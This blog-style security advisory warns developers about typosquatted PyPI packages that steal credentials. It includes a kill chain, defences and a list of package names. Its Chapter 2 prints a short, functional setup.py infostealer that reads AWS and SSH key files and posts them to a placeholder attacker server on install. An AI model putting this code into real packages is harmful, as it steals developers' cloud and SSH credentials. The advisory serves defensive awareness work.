URGENT: New Malicious PyPI Packages are Stealing Your Credentials!

By CyberDudeBivash • October 02, 2025, 07:30 AM IST • Software Supply Chain Alert

This is an urgent security alert for the entire Python development community. A new wave of malicious packages has been discovered on the official Python Package Index (PyPI) that are designed to steal developer credentials, including AWS keys, SSH keys, and other sensitive environment variables. The primary attack vector is **typosquatting**, where attackers prey on simple human error to trick developers into installing their malware. The malicious code executes immediately upon installation, exfiltrating your most sensitive secrets before you even realize a mistake has been made. This is a direct assault on the trust of the open-source ecosystem and a critical software supply chain threat. All developers and DevSecOps teams must take immediate action to audit their environments.

Disclosure: This is an urgent security advisory for developers and security professionals. It contains affiliate links to relevant security solutions and training. Your support helps fund our independent research.

Recommended by CyberDudeBivash — The Secure Developer Stack

Edureka’s DevSecOps Certification Training — Build a secure software development lifecycle (SDLC) to prevent and detect these threats automatically.
Kaspersky Endpoint Security — Your last line of defense to detect the malicious behavior of a `pip install` process reading sensitive files or making unexpected network calls.

Worried About Your Software Supply Chain?
Hire CyberDudeBivash for consulting on DevSecOps and building a secure SDLC.

Threat Report: Table of Contents

Chapter 1: The Weaponized Typo — How Typosquatting Works

Typosquatting is a simple but brutally effective social engineering attack that targets developers. Attackers identify popular, commonly used libraries and upload their own malicious packages to PyPI with names that are common misspellings.

For example:

Legitimate Package: `requests` -> Malicious Package: `reqeusts`
Legitimate Package: `python-dateutil` -> Malicious Package: `python-datetutil`
Legitimate Package: `beautifulsoup4` -> Malicious Package: `beautifullsoup4`

A busy developer, typing quickly on the command line, can easily make one of these typos. When they run `pip install reqeusts`, they are not downloading the legitimate library; they are downloading and executing the attacker’s code. This is a form of software supply chain attack similar to, but more direct than, the **‘SoopSocks’ backdoor** we recently analyzed.

Chapter 2: Threat Analysis — The Malicious `setup.py` Script

The malicious code is hidden in plain sight within the package’s `setup.py` file. This script is designed to run automatically during the `pip install` process.

The attacker’s script is a simple but potent infostealer. Here is a conceptual example of its logic:


# --- CONCEPTUAL MALICIOUS setup.py ---
import os
import requests
from setuptools import setup

# Malicious function to steal credentials
def exfiltrate_secrets():
    secrets = {}
    # Steal AWS credentials
    aws_path = os.path.expanduser('~/.aws/credentials')
    if os.path.exists(aws_path):
        with open(aws_path, 'r') as f:
            secrets['aws_creds'] = f.read()

    # Steal SSH keys
    ssh_path = os.path.expanduser('~/.ssh/id_rsa')
    if os.path.exists(ssh_path):
        with open(ssh_path, 'r') as f:
            secrets['ssh_key'] = f.read()
    
    # Send stolen data to attacker's server
    if secrets:
        requests.post("http://attacker-c2.com/collect", json=secrets)

# --- Main execution ---
# Run the malicious function immediately
exfiltrate_secrets()

# Proceed with a fake or real installation to avoid suspicion
setup(
    name='reqeusts',
    version='2.25.1',
    description='A fake package to hide malware.',
    # ... etc
)

By the time `pip` reports a successful installation, the developer’s most valuable credentials have already been stolen.

Chapter 3: The Kill Chain — From `pip install` to Full Cloud Compromise

The impact of this seemingly small mistake is catastrophic.

**Publication & Infection:** The attacker uploads the typosquatted package. A developer at a target company makes a typo and runs `pip install python-datetutil`.
**Instant Credential Theft:** The `setup.py` script executes immediately, stealing the developer’s AWS keys from their local machine and sending them to the attacker.
**Cloud Infrastructure Takeover:** The attacker uses the stolen AWS keys. If the developer had high privileges (a common mistake), the attacker now has administrative access to the company’s AWS environment.
**Impact:** The attacker can now perform any number of malicious actions:
- Spin up hundreds of expensive GPUs for cryptocurrency mining, leaving the company with a massive bill.
- Steal or delete sensitive company data stored in S3 buckets.
- Deploy ransomware across the entire fleet of cloud servers.

Chapter 4: The Defender’s Playbook — A Guide for Developers and DevSecOps Teams

Defending against typosquatting requires discipline and automation.

For Individual Developers

**Audit Your Dependencies:** Use `pip freeze` in your virtual environment and carefully read every single package name. Do they look correct? Google any you don’t recognize.
**Use `–require-hashes`:** When using a `requirements.txt` file, you can use hash-checking mode (`pip install -r requirements.txt –require-hashes`). This forces pip to verify the hash of the package it’s downloading, preventing a compromised or typosquatted package from being installed.
**Protect Your Endpoints:** Your last line of defense is an EDR that can spot the anomalous behavior of a Python script suddenly reading files in `~/.aws` or `~/.ssh` and making a network connection.

For DevSecOps Teams

**Automate Dependency Scanning:** Integrate automated security tools into your CI/CD pipeline. Tools like `pip-audit` or commercial Software Composition Analysis (SCA) solutions can automatically check your dependencies against a database of known malicious packages.
**Use a Private Repository:** Consider hosting a vetted, internal mirror of PyPI. This allows you to control exactly which packages your developers can install, preventing them from accidentally pulling a typosquatted package from the public internet.

👉 Building a secure CI/CD pipeline is the core of modern **DevSecOps**. It is a non-negotiable part of any mature software development organization.

Chapter 5: Strategic Summary & List of Malicious Packages (IOCs)

The trust-based model of open-source repositories is both a strength and a weakness. Typosquatting attacks prove that this trust can be easily abused. A multi-layered defense, combining developer vigilance, automated pipeline security, and robust endpoint protection, is the only effective strategy to mitigate this persistent software supply chain risk.

Indicators of Compromise (Known Malicious Packages)

Immediately audit all systems for the presence of the following (and similar) typosquatted packages. This is not an exhaustive list.

`python-datetutil` (instead of `python-dateutil`)
`reqeusts` (instead of `requests`)
`djanga` (instead of `django`)
`beautifullsoup4` (instead of `beautifulsoup4`)
`py-openssl` (instead of `pyopenssl`)

If you find any of these packages installed, assume the host machine and all credentials on it have been compromised. Trigger your incident response plan immediately.

🔒 Secure Your Supply Chain with CyberDudeBivash

DevSecOps & Secure SDLC Consulting
Software Supply Chain Risk Management
Automated Code Auditing (SAST) Program Development

About the Author

CyberDudeBivash is a cybersecurity strategist and researcher with over 15 years of experience in application security, DevSecOps, and software supply chain security. He provides strategic advisory services to CISOs and boards across the APAC region. [Last Updated: October 02, 2025]

#CyberDudeBivash #PyPI #Python #Malware #SupplyChain #DevSecOps #CyberSecurity #ThreatIntel #InfoSec #Typosquatting

Cyberdudebivash